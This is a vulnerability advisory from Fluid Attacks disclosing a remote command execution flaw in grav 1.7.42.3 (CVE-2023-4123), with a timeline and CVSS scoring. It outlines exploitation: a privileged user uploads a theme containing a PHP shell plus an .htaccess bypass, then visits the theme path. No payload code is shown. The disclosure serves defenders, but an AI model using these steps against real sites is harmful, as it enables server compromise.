grav 1.7.42.3 - Remote Command Execution
8
High
Discovered by
Offensive Team, Fluid Attacks
Summary
Full name
grav 1.7.42.3 - Remote Command Execution
Code name
State
Private
Release date
Aug 11, 2023
Affected product
grav 1.7.42.3
Affected version(s)
Version 1.7.42.3
Vulnerability name
Remote Command Execution
Vulnerability type
Remotely exploitable
Yes
CVSS v3.1 vector string
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H/E:H/RL:U/RC:C
CVSS v3.1 base score
8.0
Exploit available
Yes
CVE ID(s)
Description
grav allows an user to execute commands on the server by abusing the manual install themes functionality
Vulnerability
A Remote Command Execution (RCE) vulnerability has been identified in grav, a admin user or a user with Super User privilegies can upload manual themes, this functionality does not check the integrity of the packages or perform any other type of validation on the uploaded themes, with this flaw we can add a php shell we also need to add a default .htaccess file to bypass the default configuration that prevents the execution of php files in the themes folder in the folder.
Exploitation
In the Portal of grav , we need to go to Tools -> Direct Install and Upload our theme with the payload:
after that, we need to visit the theme path with our shell
Our security policy
We have reserved the ID CVE-2023-4123 to refer to this issue from now on. Disclosure policy
System Information
Version: grav 1.7.42.3
Operating System: Linux
Mitigation
There is currently no patch available for this vulnerability.
References
Vendor page https://github.com/getgrav/grav
Timeline
Vulnerability discovered
Jul 26, 2023
Vendor contacted
Jul 26, 2023
Public disclosure
Aug 11, 2023
